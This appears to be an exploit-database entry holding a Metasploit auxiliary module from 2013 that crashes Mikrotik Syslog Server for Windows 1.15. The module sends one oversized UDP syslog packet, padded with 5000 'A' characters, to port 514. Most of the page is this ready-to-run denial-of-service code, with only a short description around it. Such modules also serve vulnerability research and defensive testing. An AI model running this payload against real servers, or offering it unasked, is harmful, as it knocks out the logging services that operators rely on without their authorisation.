Mikrotik Syslog Server for Windows 1.15 - Denial of Service



EKU-ID: 3179 CVE: OSVDB-ID:
Author: xis_one Published: 2013-04-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS
# Date: 19.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:  www.mikrotik.com
# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe
# Version: 1.15 (most recent version 19.04.2013)
# Tested on: Windows XP SP3, Windows 7 SP1

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

 include Msf::Exploit::Remote::Udp
 include Msf::Auxiliary::Dos

 def initialize
  super(
   'Name'        => 'Mikrotik Syslog Server for Windows - remote BOF DOS',
   'Description' => %q{
     This module triggers the windows socket error WSAEMSGSIZE (message to long)
                                        in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
                                        The long syslog message overwrite the allocated buffer space causing the socket error.
                                         
   },
   'Author'      => 'xis_one@STM Solutions',
   'License'     => MSF_LICENSE,
   'DisclosureDate' => 'Apr 19 2013')

  register_options(
   [
    Opt::RPORT(514)
   ])
 end

 def run
  connect_udp
  pkt = "<0>" + "Apr19 " +  "10.0.0.2 " + "badass" + ": " + "A"*5000
  print_status("Crashing the remote Mikrotik syslog server #{rhost}")
  udp_sock.put(pkt)
  disconnect_udp
 end
end